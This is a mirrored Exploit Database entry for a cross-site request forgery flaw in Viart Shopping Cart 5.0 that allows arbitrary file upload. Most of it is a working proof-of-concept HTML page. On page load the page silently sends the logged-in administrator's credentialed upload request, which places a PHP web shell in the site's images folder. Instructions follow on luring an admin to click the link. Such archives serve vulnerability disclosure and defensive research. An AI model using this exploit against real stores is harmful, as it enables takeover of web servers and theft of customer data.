Viart Shopping Cart 5.0 – Cross-Site Request Forgery / Arbitrary File Upload

• Exploit Database
• 15 阅读

• 作者： Ali Ghanbari
  日期： 2016-06-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39932/

• <!--
  # Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
  # Date : 2016/06/12
  # Google Dork : Script-Kiddie ;)
  # Exploit Author : Ali Ghanbari
  # Vendor Homepage : http://www.viart.com/
  # Software Link: http://www.viart.com/php_shopping_cart_free_evaluation_download.html
  # Version : 5.0
  
  
  #POC
  -->
  
  <html>
  <body onload="submitRequest();">
  <script>
  function submitRequest()
  {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
  xhr.withCredentials = "true";
  var body = "-----------------------------256672629917035\r\n" +
  "Content-Disposition: form-data; name=\"dir_root\"\r\n" +
  "\r\n" +
  "../images\r\n" +
  "-----------------------------256672629917035\r\n" +
  "Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
  "Content-Type: application/x-php\r\n" +
  "\r\n" +
  "\r\n" +
  "-----------------------------256672629917035--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
  }
  </script>
  </body>
  </html>
  
  <!--
  #Desc:
  
  upload exploit code in your host and send link to admin when admin click on link, you can
  access to your shell from below path :
  
  http://localhost/images/[your shell]
  
  ####################################
   
  [+]Exploit by: Ali Ghanbari
  
  [+]My Telegram :@Exploiter007
  -->